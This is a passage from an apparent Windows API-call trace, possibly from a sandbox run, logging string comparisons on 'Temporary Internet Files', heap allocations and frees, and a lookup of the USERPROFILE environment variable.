(Locale=0x400, dwCmpFlags=0x1, lpString1="mporary Internet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="porary Internet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="orary Internet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rary Internet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ary Internet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ry Internet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Internet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Internet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Internet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nternet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ternet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ernet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rnet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="net Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="et Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0251.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0251.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0251.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0251.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0251.220] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0251.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0251.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0251.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0251.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0251.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0251.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0251.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0251.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0251.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x32) returned 0x246d820 [0251.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0251.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Temporary Internet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="emporary Internet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0251.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mporary Internet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="porary Internet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="orary Internet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rary Internet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ary Internet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0251.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ry Internet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Internet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Internet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0251.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Internet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nternet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ternet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ernet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0251.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rnet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="net Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="et Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0251.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0251.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0251.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0251.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0251.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0251.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0251.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0251.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0251.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0251.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0251.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0251.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0251.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0251.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0251.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0251.223] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0251.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0251.223] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0251.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0251.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0251.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0251.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16e8 [0251.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0251.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0251.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0251.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0251.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0251.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0251.224] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0251.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0251.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0251.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa580 [0251.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0251.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0251.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa78 [0251.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0251.224] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0251.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0251.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0251.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0251.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0251.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0251.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0251.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0251.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0251.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0251.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0251.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0251.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0251.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0251.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0251.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0251.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0251.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0251.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0251.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0251.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1438 [0251.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0251.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0251.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0251.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0251.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0251.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0251.226] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0251.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0251.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0251.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0251.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0251.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa78 [0251.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0251.227] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0251.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0251.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0251.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0251.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0251.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0251.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0251.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0251.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0251.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0251.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0251.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0251.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x249c7b0 [0251.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0251.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0251.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0251.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0251.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0251.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0251.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2088 [0251.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0251.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0251.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0251.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa580 [0251.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0251.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0251.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0251.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0251.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0251.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0251.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0251.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0251.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0251.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0251.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0251.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0251.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0251.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0251.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0251.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0251.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0251.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0251.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0251.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0251.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0251.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0251.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0251.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0251.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0251.230] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0251.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0251.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0251.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0251.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0251.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0251.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0251.231] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0251.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0251.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0251.231] HeapFree (in: 